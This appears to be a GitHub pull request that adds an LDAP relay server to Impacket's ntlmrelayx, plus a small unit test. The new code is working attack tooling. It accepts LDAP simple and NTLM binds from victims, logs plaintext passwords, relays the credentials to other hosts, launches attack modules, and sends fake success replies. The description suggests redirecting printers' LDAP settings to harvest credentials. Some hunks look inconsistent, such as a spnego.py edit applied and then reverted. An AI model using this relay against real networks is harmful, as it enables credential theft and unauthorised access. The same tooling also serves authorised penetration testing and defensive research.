### PR TITLE
Add LDAP relay server to ntlmrelayx

### DIFF
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -53,7 +53,7 @@ from threading import Thread
 
 from impacket import version
 from impacket.examples import logger
-from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer, WCFRelayServer, RAWRelayServer, RPCRelayServer
+from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer, WCFRelayServer, RAWRelayServer, RPCRelayServer, LDAPRelayServer
 from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig, parse_listening_ports
 from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor, TargetsFileWatcher
 from impacket.examples.ntlmrelayx.servers.socksserver import SOCKS
@@ -246,6 +246,8 @@ def start_servers(options, threads):
             c.setListeningPort(options.raw_port)
         elif server is RPCRelayServer:
             c.setListeningPort(options.rpc_port)
+        elif server is LDAPRelayServer:
+            c.setListeningPort(options.ldap_port)
 
         s = server(c)
         s.start()
@@ -298,12 +300,14 @@ if __name__ == '__main__':
     serversoptions.add_argument('--no-wcf-server', action='store_true', help='Disables the WCF server')
     serversoptions.add_argument('--no-raw-server', action='store_true', help='Disables the RAW server')
     serversoptions.add_argument('--no-rpc-server', action='store_true', help='Disables the RPC server')
+    serversoptions.add_argument('--no-ldap-server', action='store_true', help='Disables the LDAP server')
 
     parser.add_argument('--smb-port', type=int, help='Port to listen on smb server', default=445)
     parser.add_argument('--http-port', help='Port(s) to listen on HTTP server. Can specify multiple ports by separating them with `,`, and ranges with `-`. Ex: `80,8000-8010`', default="80")
     parser.add_argument('--wcf-port', type=int, help='Port to listen on wcf server', default=9389)  # ADWS
     parser.add_argument('--raw-port', type=int, help='Port to listen on raw server', default=6666)
     parser.add_argument('--rpc-port', type=int, help='Port to listen on rpc server', default=135)
+    parser.add_argument('--ldap-port', type=int, help='Port to listen on ldap server', default=389)
 
     parser.add_argument('--no-multirelay', action="store_true", required=False, help='If set, disable multi-host relay (SMB and HTTP servers)')
     parser.add_argument('--keep-relaying', action="store_true", required=False, help='If set, keeps relaying to a target even after a successful connection on it')
@@ -512,6 +516,9 @@ if __name__ == '__main__':
 
     if not options.no_rpc_server:
         RELAY_SERVERS.append(RPCRelayServer)
+
+    if not options.no_ldap_server:
+        RELAY_SERVERS.append(LDAPRelayServer)
 
     if targetSystem is not None and options.w:
         watchthread = TargetsFileWatcher(targetSystem)

--- a/impacket/examples/ntlmrelayx/attacks/__init__.py
+++ b/impacket/examples/ntlmrelayx/attacks/__init__.py
@@ -40,9 +40,14 @@ class ProtocolAttack(Thread):
         self.config = config
         self.client = client
         # By default we only use the username and remove the domain
-        self.username = username.split('/')[1]
-        # But we also store the domain for later use
-        self.domain = username.split('/')[0]
+        # We handle both slashes since the username can be in either format
+        if '\\' in username:
+            self.domain, self.username = username.split('\\')
+        elif '/' in username:
+            self.domain, self.username = username.split('/')
+        else:
+            self.domain = ''
+            self.username = username
 
     def run(self):
         raise RuntimeError('Virtual Function')

--- a/impacket/examples/ntlmrelayx/clients/ldaprelayclient.py
+++ b/impacket/examples/ntlmrelayx/clients/ldaprelayclient.py
@@ -164,6 +164,15 @@ class LDAPRelayClient(ProtocolClient):
             search_scope='BASE',
             attributes=['namingContexts'])
 
+    def login(self, user, password):
+        self.session.user = user
+        self.session.password = password
+        self.session.authentication = 'SIMPLE'
+        if self.session.bind():
+            return None, STATUS_SUCCESS
+        else:
+            return None, STATUS_ACCESS_DENIED
+
 class LDAPSRelayClient(LDAPRelayClient):
     PLUGIN_NAME = "LDAPS"
     MODIFY_ADD = MODIFY_ADD

--- a/impacket/examples/ntlmrelayx/servers/__init__.py
+++ b/impacket/examples/ntlmrelayx/servers/__init__.py
@@ -13,3 +13,4 @@ from impacket.examples.ntlmrelayx.servers.smbrelayserver import SMBRelayServer
 from impacket.examples.ntlmrelayx.servers.wcfrelayserver import WCFRelayServer
 from impacket.examples.ntlmrelayx.servers.rawrelayserver import RAWRelayServer
 from impacket.examples.ntlmrelayx.servers.rpcrelayserver import RPCRelayServer
+from impacket.examples.ntlmrelayx.servers.ldaprelayserver import LDAPRelayServer

--- a/impacket/examples/ntlmrelayx/servers/ldaprelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/ldaprelayserver.py
@@ -359,7 +359,9 @@ class LDAPHandler(Thread):
                 return
         
         from impacket.structure import hexdump
-        logging.debug("LDAP: auth_message_data hexdump:\n%s" % hexdump(auth_message_data))
+        logging.debug("LDAP: auth_message_data hexdump:")
+        if logging.getLogger().level == logging.DEBUG:
+            hexdump(auth_message_data)
         
         authenticate_message = ntlm.NTLMAuthChallengeResponse()
         authenticate_message.fromString(auth_message_data)

--- a/impacket/examples/ntlmrelayx/servers/ldaprelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/ldaprelayserver.py
@@ -15,7 +15,8 @@
 #   to other protocols
 #
 # Authors:
-#   Alberto Solino (@agsolino)
+#   Emily Astranova (@emilyastranova)
+#   Roman Karwacik (@romern)
 #
 from __future__ import division
 from __future__ import print_function

--- a/impacket/examples/ntlmrelayx/servers/ldaprelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/ldaprelayserver.py
@@ -305,8 +305,12 @@ class LDAPHandler(Thread):
 
         self.server.target = self.server.targetprocessor.getTarget()
         if self.server.target is None:
-            logging.info('LDAP: No more targets left!')
-            return
+            if self.server.config.keepRelaying:
+                self.server.config.target.reloadTargets(full_reload=True)
+                self.server.target = self.server.config.target.getTarget()
+            else:
+                logging.info('LDAP: No more targets left!')
+                return
 
         logging.info("LDAP: Relaying credentials to %s://%s" % (self.server.target.scheme, self.server.target.netloc))
 

--- a/impacket/examples/ntlmrelayx/servers/ldaprelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/ldaprelayserver.py
@@ -195,8 +195,12 @@ class LDAPHandler(Thread):
 
         self.server.target = self.server.targetprocessor.getTarget()
         if self.server.target is None:
-            logging.info('LDAP: No more targets left!')
-            return
+            if self.server.config.keepRelaying:
+                self.server.config.target.reloadTargets(full_reload=True)
+                self.target = self.server.config.target.getTarget()
+            else:
+                logging.info('LDAP: No more targets left!')
+                return
 
         logging.info("LDAP: Relaying credentials for %s to %s://%s" % (username, self.server.target.scheme, self.server.target.netloc))
 

--- a/impacket/examples/ntlmrelayx/servers/ldaprelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/ldaprelayserver.py
@@ -110,8 +110,9 @@ class LDAPHandler(Thread):
                         logging.warning("LDAP server only supports BIND, SEARCH and UNBIND requests, received %s" % decoded_message['protocolOp'].getName())
 
             except Exception:
-                logging.error("Exception in LDAPHandler.run:")
-                logging.error(traceback.format_exc())
+                logging.error("Exception in LDAPHandler.run. Use -debug to view full traceback")
+                if logging.getLogger().level == logging.DEBUG:
+                    logging.error(traceback.format_exc())
                 break
         self.conn.close()
 

--- a/impacket/examples/ntlmrelayx/servers/ldaprelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/ldaprelayserver.py
@@ -1,0 +1,385 @@
+# Impacket - Collection of Python classes for working with network protocols.
+#
+# Copyright Fortra, LLC and its affiliated companies 
+#
+# All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+#   LDAP Relay Server
+#
+#   This is the LDAP server which relays the connections
+#   to other protocols
+#
+# Authors:
+#   Alberto Solino (@agsolino)
+#
+from __future__ import division
+from __future__ import print_function
+from threading import Thread
+import socket
+import logging
+import traceback
+
+import struct
+import socket
+import logging
+from threading import Thread
+from impacket.ldap import ldapasn1
+from pyasn1.codec.ber import decoder, encoder
+from pyasn1.type import univ
+from impacket import ntlm
+from impacket.spnego import SPNEGO_NegTokenInit, TypesMech, SPNEGO_NegTokenResp
+from impacket.nt_errors import STATUS_SUCCESS, STATUS_MORE_PROCESSING_REQUIRED
+from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor
+
+class LDAPRelayServer(Thread):
+    def __init__(self,config):
+        Thread.__init__(self)
+        self.daemon = True
+        self.server = 0
+        #Config object
+        self.config = config
+        #Current target IP
+        self.target = None
+        #Targets handler
+        self.targetprocessor = self.config.target
+        #Username we auth as gets stored here later
+        self.authUser = None
+        self.proxyTranslator = None
+        self.challenges = {}
+
+        # Change address_family to IPv6 if this is configured
+        if self.config.ipv6:
+            self.address_family = socket.AF_INET6
+        else:
+            self.address_family = socket.AF_INET
+
+        if self.config.listeningPort:
+            self.ldapport = self.config.listeningPort
+        else:
+            self.ldapport = 389
+
+    def run(self):
+        logging.info("Setting up LDAP Server on port %s" % self.ldapport)
+        self.sock = socket.socket(self.address_family, socket.SOCK_STREAM)
+        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+        self.sock.bind((self.config.interfaceIp, self.ldapport))
+        self.sock.listen(1)
+
+        while True:
+            conn, addr = self.sock.accept()
+            logging.info('LDAP connection from %s' % str(addr))
+            handler = LDAPHandler(conn, addr, self)
+            handler.start()
+
+class LDAPHandler(Thread):
+    def __init__(self, conn, addr, server):
+        Thread.__init__(self)
+        self.daemon = True
+        self.conn = conn
+        self.addr = addr
+        self.server = server
+        self.client = None
+        self.challengeMessage = None
+
+    def run(self):
+        connection_active = True
+        while connection_active:
+            try:
+                data = self.conn.recv(1024)
+                if not data:
+                    break
+
+                while len(data) > 0:
+                    decoded_message, data = decoder.decode(data, asn1Spec=ldapasn1.LDAPMessage())
+
+                    if decoded_message['protocolOp'].getName() == 'bindRequest':
+                        self.handle_bind_request(decoded_message)
+                    elif decoded_message['protocolOp'].getName() == 'searchRequest':
+                        self.handle_search_request(decoded_message)
+                    elif decoded_message['protocolOp'].getName() == 'unbindRequest':
+                        logging.info("LDAP: Unbind request received, closing connection.")
+                        connection_active = False
+                        break
+                    else:
+                        logging.warning("LDAP server only supports BIND, SEARCH and UNBIND requests, received %s" % decoded_message['protocolOp'].getName())
+
+            except Exception:
+                logging.error("Exception in LDAPHandler.run:")
+                logging.error(traceback.format_exc())
+                break
+        self.conn.close()
+
+    def handle_search_request(self, ldap_message):
+        search_request = ldap_message['protocolOp']['searchRequest']
+        # We need to craft a searchResEntry and a searchResDone message to the client
+        # This is a fake search entry, but it should be enough to make the client happy
+        search_res_entry = ldapasn1.SearchResultEntry()
+        search_res_entry['objectName'] = ''
+        
+        attributes = ldapasn1.PartialAttributeList()
+        for requested_attribute in search_request['attributes']:
+            pa = ldapasn1.PartialAttribute()
+            pa['type'] = requested_attribute
+            vals = univ.SetOf()
+            if str(requested_attribute) == 'defaultNamingContext':
+                vals.append(ldapasn1.AttributeValue('DC=impacket,DC=local'))
+            pa['vals'] = vals
+            attributes.append(pa)
+        search_res_entry['attributes'] = attributes
+        
+        response_ldap_message_entry = ldapasn1.LDAPMessage()
+        response_ldap_message_entry['messageID'] = ldap_message['messageID']
+        response_ldap_message_entry['protocolOp']['searchResEntry'] = search_res_entry
+        self.conn.sendall(encoder.encode(response_ldap_message_entry))
+
+        search_res_done = ldapasn1.SearchResultDone()
+        search_res_done['resultCode'] = ldapasn1.ResultCode('success')
+        search_res_done['matchedDN'] = ''
+        search_res_done['diagnosticMessage'] = ''
+
+        response_ldap_message_done = ldapasn1.LDAPMessage()
+        response_ldap_message_done['messageID'] = ldap_message['messageID']
+        response_ldap_message_done['protocolOp']['searchResDone'] = search_res_done
+
+        self.conn.sendall(encoder.encode(response_ldap_message_done))
+
+    def handle_bind_request(self, ldap_message):
+        bind_request = ldap_message['protocolOp']['bindRequest']
+        logging.debug("LDAP: Full bind request: %s" % bind_request)
+        auth_choice = bind_request['authentication']
+        
+        logging.debug("LDAP: Received bind request with auth choice: %s" % auth_choice.getName())
+
+        if auth_choice.getName() == 'sasl':
+            sasl_credentials = auth_choice['sasl']
+            mechanism = sasl_credentials['mechanism']
+            
+            if 'GSS-SPNEGO' in str(mechanism):
+                self.handle_spnego_bind(ldap_message, sasl_credentials)
+            else:
+                logging.error("Unsupported SASL mechanism: %s" % mechanism)
+        elif auth_choice.getName() == 'simple':
+            username = bind_request['name'].asOctets().decode('utf-8')
+            password = auth_choice['simple'].asOctets().decode('utf-8')
+            self.handle_simple_bind(ldap_message, username, password)
+        elif auth_choice.getName() == 'sicilyNegotiate' or auth_choice.getName() == 'sicilyResponse':
+            self.handle_sicily_bind(ldap_message, auth_choice)
+        else:
+            logging.error("Unsupported authentication choice: %s" % auth_choice.getName())
+
+    def handle_simple_bind(self, ldap_message, username, password):
+        logging.debug("LDAP: Simple bind request received for user: %r" % username)
+        logging.debug("LDAP: Password: %r" % password)
+        if not username:
+            logging.warning("LDAP: Anonymous bind requests cannot be relayed (or username was not parsed correctly).")
+            # Send a bind response indicating success
+            bind_response = ldapasn1.BindResponse()
+            bind_response['resultCode'] = ldapasn1.ResultCode('invalidCredentials')
+            bind_response['matchedDN'] = ''
+            bind_response['diagnosticMessage'] = ''
+
+            response_ldap_message = ldapasn1.LDAPMessage()
+            response_ldap_message['messageID'] = ldap_message['messageID']
+            response_ldap_message['protocolOp']['bindResponse'] = bind_response
+
+            self.conn.sendall(encoder.encode(response_ldap_message))
+            return
+            
+        if self.server.config.mode.upper() == 'REFLECTION':
+            self.server.targetprocessor = TargetsProcessor(singleTarget='LDAP://%s:%d' % (self.addr[0], self.ldapport))
+
+        self.server.target = self.server.targetprocessor.getTarget()
+        if self.server.target is None:
+            logging.info('LDAP: No more targets left!')
+            return
+
+        logging.info("LDAP: Relaying credentials for %s to %s://%s" % (username, self.server.target.scheme, self.server.target.netloc))
+
+        try:
+            self.client = self.server.config.protocolClients[self.server.target.scheme.upper()](self.server.config, self.server.target)
+            if not self.client.initConnection():
+                raise Exception("Could not initialize connection")
+        except Exception as e:
+            logging.error("LDAP: Connection against target %s://%s FAILED: %s" % (self.server.target.scheme, self.server.target.netloc, str(e)))
+            self.server.targetprocessor.registerTarget(self.server.target, False, username)
+            return
+
+        clientResponse, error_code = self.client.login(username, password)
+
+        if error_code == STATUS_SUCCESS:
+            logging.info("LDAP: Authentication successful!")
+            self.server.targetprocessor.registerTarget(self.server.target, True, username)
+            if self.server.target.scheme.upper() in self.server.config.attacks:
+                clientThread = self.server.config.attacks[self.server.target.scheme.upper()](self.server.config, self.client.session, username)
+                clientThread.start()
+        else:
+            logging.error("LDAP: Authentication failed!")
+            self.server.targetprocessor.registerTarget(self.server.target, False, username)
+
+        bind_response = ldapasn1.BindResponse()
+        bind_response['resultCode'] = ldapasn1.ResultCode('success')
+        bind_response['matchedDN'] = ''
+        bind_response['diagnosticMessage'] = ''
+        
+        response_ldap_message = ldapasn1.LDAPMessage()
+        response_ldap_message['messageID'] = ldap_message['messageID']
+        response_ldap_message['protocolOp']['bindResponse'] = bind_response
+        
+        self.conn.sendall(encoder.encode(response_ldap_message))
+
+    def handle_sicily_bind(self, ldap_message, auth_choice):
+        token = auth_choice.getComponent().asOctets()
+        logging.debug("LDAP: Received Sicily NTLM token: %r" % token)
+        from impacket.structure import hexdump
+        logging.debug("LDAP: Sicily NTLM token hexdump:\n%s" % hexdump(token))
+
+        if not token.startswith(b'NTLMSSP\x00'):
+            logging.error("Unknown NTLM message type")
+            return
+
+        message_type = struct.unpack('<L', token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
+        logging.debug("LDAP: NTLM message type: %d" % message_type)
+
+        if message_type == 0x01:  # NTLMSSP_NEGOTIATE
+            self.handle_negotiate(ldap_message, token, auth_type='sicily')
+        elif message_type == 0x03:  # NTLMSSP_AUTH
+            self.handle_auth(ldap_message, token)
+        else:
+            logging.error("Unknown NTLM message type: %d" % message_type)
+
+    def handle_spnego_bind(self, ldap_message, sasl_credentials):
+        token = sasl_credentials['credentials']
+        logging.debug("LDAP: Received SPNEGO NTLM token: %r" % token)
+        
+        if len(token) > 0:
+            try:
+                neg_token_init = decoder.decode(token.asOctets(), asn1Spec=SPNEGO_NegTokenInit())[0]
+                mech_token = neg_token_init['mechToken'].asOctets()
+            except:
+                # It's probably a NTLMSSP AUTH packet
+                mech_token = token.asOctets()
+
+            logging.debug("LDAP: Extracted mech_token: %r" % mech_token)
+            
+            # Search for the NTLMSSP header
+            ntlm_header = b'NTLMSSP\x00'
+            ntlm_start = mech_token.find(ntlm_header)
+            if ntlm_start == -1:
+                logging.error("Unknown NTLM message type")
+                return
+            
+            mech_token = mech_token[ntlm_start:]
+            from impacket.structure import hexdump
+            logging.debug("LDAP: NTLM message from mech_token hexdump:\n%s" % hexdump(mech_token))
+
+            if not mech_token.startswith(b'NTLMSSP\x00'):
+                logging.error("Unknown NTLM message type")
+                return
+
+            message_type = struct.unpack('<L', mech_token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
+            logging.debug("LDAP: NTLM message type: %d" % message_type)
+            
+            if message_type == 0x01: # NTLMSSP_NEGOTIATE
+                self.handle_negotiate(ldap_message, mech_token, auth_type='spnego')
+            elif message_type == 0x03: # NTLMSSP_AUTH
+                self.handle_auth(ldap_message, mech_token)
+            else:
+                logging.error("Unknown NTLM message type: %d" % message_type)
+
+    def handle_negotiate(self, ldap_message, negotiate_message_data, auth_type='spnego'):
+        if self.server.config.mode.upper() == 'REFLECTION':
+            self.server.targetprocessor = TargetsProcessor(singleTarget='LDAP://%s:%d' % (self.addr[0], self.ldapport))
+
+        self.server.target = self.server.targetprocessor.getTarget()
+        if self.server.target is None:
+            logging.info('LDAP: No more targets left!')
+            return
+
+        logging.info("LDAP: Relaying credentials to %s://%s" % (self.server.target.scheme, self.server.target.netloc))
+
+        try:
+            self.client = self.server.config.protocolClients[self.server.target.scheme.upper()](self.server.config, self.server.target)
+            if not self.client.initConnection():
+                raise Exception("Could not initialize connection")
+        except Exception as e:
+            logging.error("LDAP: Connection against target %s://%s FAILED: %s" % (self.server.target.scheme, self.server.target.netloc, str(e)))
+            self.server.targetprocessor.registerTarget(self.server.target, False, self.server.authUser)
+            return
+
+        self.challengeMessage = self.client.sendNegotiate(negotiate_message_data)
+        self.server.challenges[self.addr[0]] = self.challengeMessage
+
+        bind_response = ldapasn1.BindResponse()
+        bind_response['diagnosticMessage'] = ''
+
+        if auth_type == 'spnego':
+            bind_response['resultCode'] = ldapasn1.ResultCode('saslBindInProgress')
+            bind_response['matchedDN'] = ''
+
+            resp_token = SPNEGO_NegTokenResp()
+            resp_token['negState'] = b'\x01'  # accept-incomplete
+            resp_token['supportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
+            resp_token['responseToken'] = self.challengeMessage.getData()
+
+            bind_response['serverSaslCreds'] = resp_token.getData()
+        
+        elif auth_type == 'sicily':
+            bind_response['resultCode'] = ldapasn1.ResultCode('saslBindInProgress')
+            bind_response['matchedDN'] = self.challengeMessage.getData()
+
+        response_ldap_message = ldapasn1.LDAPMessage()
+        response_ldap_message['messageID'] = ldap_message['messageID']
+        response_ldap_message['protocolOp']['bindResponse'] = bind_response
+
+        self.conn.sendall(encoder.encode(response_ldap_message))
+
+    def handle_auth(self, ldap_message, auth_message_data):
+        if self.challengeMessage is None:
+            if self.addr[0] in self.server.challenges:
+                self.challengeMessage = self.server.challenges.pop(self.addr[0])
+            else:
+                logging.error("No challenge message found for %s" % self.addr[0])
+                return
+        
+        from impacket.structure import hexdump
+        logging.debug("LDAP: auth_message_data hexdump:\n%s" % hexdump(auth_message_data))
+        
+        authenticate_message = ntlm.NTLMAuthChallengeResponse()
+        authenticate_message.fromString(auth_message_data)
+        logging.debug("LDAP: NTLM AUTH FIELDS: domain_name: %r, user_name: %r, ntlm response length: %d" % (
+            authenticate_message['domain_name'],
+            authenticate_message['user_name'],
+            len(authenticate_message['ntlm'])
+        ))
+        self.server.authUser = authenticate_message.getUserString()
+        logging.debug("LDAP: Authenticated user string: %r" % self.server.authUser)
+
+        clientResponse, error_code = self.client.sendAuth(auth_message_data, self.challengeMessage['challenge'])
+
+        if error_code == STATUS_SUCCESS:
+            logging.info("LDAP: Authentication successful!")
+            self.server.targetprocessor.registerTarget(self.server.target, True, self.server.authUser)
+            if self.server.target.scheme.upper() in self.server.config.attacks:
+                clientThread = self.server.config.attacks[self.server.target.scheme.upper()](self.server.config, self.client.session, self.server.authUser)
+                clientThread.start()
+        else:
+            logging.error("LDAP: Authentication failed!")
+            self.server.targetprocessor.registerTarget(self.server.target, False, self.server.authUser)
+
+        bind_response = ldapasn1.BindResponse()
+        bind_response['resultCode'] = ldapasn1.ResultCode('success')
+        bind_response['matchedDN'] = ''
+        bind_response['diagnosticMessage'] = ''
+        
+        response_ldap_message = ldapasn1.LDAPMessage()
+        response_ldap_message['messageID'] = ldap_message['messageID']
+        response_ldap_message['protocolOp']['bindResponse'] = bind_response
+        
+        self.conn.sendall(encoder.encode(response_ldap_message))
+
+

--- a/impacket/examples/ntlmrelayx/servers/ldaprelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/ldaprelayserver.py
@@ -240,7 +240,9 @@ class LDAPHandler(Thread):
         token = auth_choice.getComponent().asOctets()
         logging.debug("LDAP: Received Sicily NTLM token: %r" % token)
         from impacket.structure import hexdump
-        logging.debug("LDAP: Sicily NTLM token hexdump:\n%s" % hexdump(token))
+        logging.debug("LDAP: Sicily NTLM token hexdump:")
+        if logging.getLogger().level == logging.DEBUG:
+            hexdump(token)
 
         if not token.startswith(b'NTLMSSP\x00'):
             logging.error("Unknown NTLM message type")

--- a/impacket/examples/ntlmrelayx/servers/ldaprelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/ldaprelayserver.py
@@ -281,7 +281,9 @@ class LDAPHandler(Thread):
             
             mech_token = mech_token[ntlm_start:]
             from impacket.structure import hexdump
-            logging.debug("LDAP: NTLM message from mech_token hexdump:\n%s" % hexdump(mech_token))
+            logging.debug("LDAP: NTLM message from mech_token hexdump:")
+            if logging.getLogger().level == logging.DEBUG:
+                hexdump(mech_token)
 
             if not mech_token.startswith(b'NTLMSSP\x00'):
                 logging.error("Unknown NTLM message type")

--- a/impacket/examples/ntlmrelayx/utils/targetsutils.py
+++ b/impacket/examples/ntlmrelayx/utils/targetsutils.py
@@ -137,7 +137,7 @@ class TargetsProcessor:
                     if target.username.upper() == identity.replace('/', '\\'):
                         self.namedCandidates.remove(target)
                         return target
-                    if target.username.find('\\') < 0:
+                    if target.username.find('\\') < 0 and identity.find('/') >= 0:
                         # Username with no domain, let's compare that way
                         if target.username.upper() == identity.split('/')[1]:
                             self.namedCandidates.remove(target)

--- a/impacket/spnego.py
+++ b/impacket/spnego.py
@@ -322,7 +322,7 @@ class SPNEGO_NegTokenResp:
                     asn1encode(
                     pack('B', ASN1_RESPONSE_TOKEN) +
                     asn1encode(
-                    pack('B', ASN1_OCTET_STRING) + asn1encode(self['responseToken']))))
+                    pack('B', ASN1_OCTET_STRING) + asn1encode(self['ResponseToken']))))
         return ans
 
 class SPNEGO_NegTokenInit(GSSAPI):

--- a/impacket/spnego.py
+++ b/impacket/spnego.py
@@ -322,7 +322,7 @@ class SPNEGO_NegTokenResp:
                     asn1encode(
                     pack('B', ASN1_RESPONSE_TOKEN) +
                     asn1encode(
-                    pack('B', ASN1_OCTET_STRING) + asn1encode(self['ResponseToken']))))
+                    pack('B', ASN1_OCTET_STRING) + asn1encode(self['responseToken']))))
         return ans
 
 class SPNEGO_NegTokenInit(GSSAPI):

--- a/tests/ldap/test_ldap.py
+++ b/tests/ldap/test_ldap.py
@@ -1,0 +1,47 @@
+
+import unittest
+from impacket.ldap import ldapasn1
+from impacket.examples.ntlmrelayx.servers.ldaprelayserver import LDAPHandler
+
+class MockConn:
+    def sendall(self, data):
+        pass
+
+class MockServer:
+    def __init__(self):
+        self.config = MockConfig()
+
+class MockConfig:
+    def __init__(self):
+        self.target = None
+        self.protocolClients = {}
+        self.attacks = {}
+        self.mode = ''
+
+class LdapRelayServerTests(unittest.TestCase):
+    def test_handle_simple_bind(self):
+        # Create a mock LDAP message
+        ldap_message = ldapasn1.LDAPMessage()
+        ldap_message['messageID'] = 1
+        bind_request = ldapasn1.BindRequest()
+        bind_request['version'] = 3
+        bind_request['name'] = 'testuser'
+        auth_choice = ldapasn1.AuthenticationChoice()
+        auth_choice['simple'] = 'testpass'
+        bind_request['authentication'] = auth_choice
+        ldap_message['protocolOp']['bindRequest'] = bind_request
+
+        # Create a mock LDAP handler
+        handler = LDAPHandler(MockConn(), ('127.0.0.1', 12345), MockServer())
+
+        # Mock the handle_simple_bind method to capture the arguments
+        def mock_handle_simple_bind(ldap_message, username, password):
+            self.assertEqual(username, 'testuser')
+            self.assertEqual(password, 'testpass')
+        handler.handle_simple_bind = mock_handle_simple_bind
+
+        # Call the handle_bind_request method
+        handler.handle_bind_request(ldap_message)
+
+if __name__ == "__main__":
+    unittest.main(verbosity=1)


### PR DESCRIPTION
Added support for incoming LDAP credentials and the ability to relay them using things like the `-i` interactive shell.

<img width="763" height="279" alt="image" src="https://github.com/user-attachments/assets/21791a23-f349-4d4f-be97-484406ae4600" />

Useful for things like finding printers with LDAP configured and changing the hostname to your own host.